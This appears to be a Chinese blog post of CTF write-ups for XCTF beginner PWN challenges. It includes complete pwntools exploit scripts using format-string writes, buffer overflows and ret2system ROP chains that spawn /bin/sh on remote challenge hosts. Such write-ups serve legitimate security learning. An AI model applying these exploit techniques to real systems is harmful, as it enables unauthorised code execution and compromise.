getshell
nc后直接cat flag即可
CGfsb
![图片[1]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/01/图片-3.png)
ida代码进行审计,printf(&s)存在格式化字符串漏洞,可以泄露栈地址
![图片[2]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/01/图片-4.png)
双击pwnme可以查看其地址,
1、我们需要将pwnme的地址输入到s中去
2、在合适的位置上加一个%n
,使其与我们输入的地址对应从而造成漏洞利用 所以接下来的问题变成了如何让他们对应起来
通过格式化字符串漏洞找到偏移量
![图片[3]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/01/图片-6-1024x87.png)
可知,偏移量为10
撰写exp
from pwn import *
r = remote('220.249.52.134', 35910)
pwnme_addr = 0x0804A068 #pwnme的地址
payload = p32(pwnme_addr) + 'aaaa' + '%10$n'
r.recvuntil("please tell me your name:\n")
r.sendline('snowywar')
r.recvuntil("leave your message please:\n")
r.sendline(payload)
r.interactive()
![图片[4]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/01/图片-7.png)
hello_pwn
![图片[5]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-1024x130.png)
开启了NX保护(代码不可执行)
丢入ida分析
![图片[6]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-1.png)
程序简单,unk_601068距离dword_60106c为四个空值
![图片[7]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-2.png)
![图片[8]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-3.png)
让dword_60106c等于1853186401即可getflag
exp
from pwn import *
p = remote('111.200.241.244',49196)
context.log_level = 'debug'
bf_1= 'A' * 4 +p64(1853186401)
#p.recvuntil("lets lets get helloworld for bof\n")
p.sendline(bf_1)
p.interactive()
![图片[9]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-4.png)
level2
checksec一下
![图片[10]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-5-1024x106.png)
开启了NX保护,放入ida进行分析
![图片[11]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-6.png)
直接读入数据,读&buf,共有0x88偏移
![图片[12]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-7.png)
![图片[13]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-8.png)
寻找system进行构筑rop链,
![图片[14]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-10.png)
![图片[15]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-9.png)
字符串可发现/bin/sh,构筑exp
from pwn import *
p = remote('111.200.241.244',30664)
context.log_level = 'debug'
bin_sh = 0x0804A024
sysaddr = 0x08048320
payload = 'a' *0x88+'b'*4+p32(sysaddr)+p32(0)+p32(bin_sh)
p.send(payload)
p.interactive()
![图片[16]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-11.png)
cgpwn2
![图片[17]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-12-1024x184.png)
经典查看保护,然后开ida进行分析
![图片[18]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-13.png)
main函数啥也没干,看hello
![图片[19]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-14.png)
gets函数存在溢出,
![图片[20]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-15-1024x200.png)
调用system,但是没有/bin/bash
![图片[21]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-16.png)
name地址段固定
![图片[22]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-17.png)
收集system的地址,
转写exp
from pwn import *
context.log_level = 'debug'
r = remote('111.200.241.244',45215)
sys_addr = 0x8048420
addr = 0x0804A080
r.recvuntil('your name')
r.sendline('/bin/sh')
r.recvline('leave some message here:')
payload = 'a' * 0x26 +'aaaa'+p32(sys_addr)+p32(0)+p32(addr)
r.sendline(payload)
r.interactive()
![图片[23]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/02/image-18.png)
when_did_you_born
基操
![图片[24]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-16-1024x174.png)
没有开PIE,进入ide进行分析
![图片[25]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-17.png)
v4是存在溢出的,同时
第一次要保证v5不能等于1926,那就让v4进行溢出覆盖v5的值即可
![图片[26]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-18.png)
v4,v5距离八个字节,
exp:
from pwn import *
context.log_level = 'debug'
p=remote("111.200.241.244",31405)
p.recvline("What's Your Birth?")
p.sendline('a')
p.recvline("What's Your Name?")
p.sendline("a"* 8 + p64(1926))
p.interactive()
![图片[27]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-19.png)
level2
题目说了用ROP ,那就懒得去checksec了,直接ida分析
![图片[28]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-21.png)
主函数调用vulnerable_function();
![图片[29]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-22.png)
function处啥也没干,就是进行输入。
![图片[30]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-23.png)
通过字符串窗口找到/bin/sh,确定地址
![图片[31]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-24.png)
![图片[32]-XCTF新手区PWN 记录-魔法少女雪殇](http://snowywar.top/wordpress/wp-content/uploads/2021/03/image-25-1024x81.png)
最后跟一下system,直接构筑payload语句getshell
#encoding=utf-8
from pwn import *
context.log_level = 'debug'
p=remote("111.200.241.244",30834)
p.recvline("Input:")
elf = ELF('/home/ubuntu/桌面/p1')
payload = 'a' * (0x88+0x4) +p32(elf.symbols['system'])+'a' * 4 +p32(0x804A024)
p.sendline(payload)
p.interactive()
© 版权声明
文章版权归作者所有,未经允许请勿转载。
THE END
暂无评论内容